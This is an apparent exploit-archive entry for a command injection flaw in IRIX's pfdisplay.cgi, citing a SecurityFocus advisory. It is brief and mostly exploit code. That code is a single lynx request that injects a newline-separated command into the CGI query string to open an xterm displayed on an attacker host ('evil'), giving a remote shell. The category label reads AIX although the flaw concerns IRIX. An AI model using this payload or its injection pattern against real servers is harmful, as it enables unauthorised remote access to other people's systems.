IRIX <= 6.4 pfdisplay.cgi Vulnerability

friedolin 07.04.1998 Verified
Remote Exploits AIX

Exploit Code

source: http://www.securityfocus.com/bid/64/info

There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018.

$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'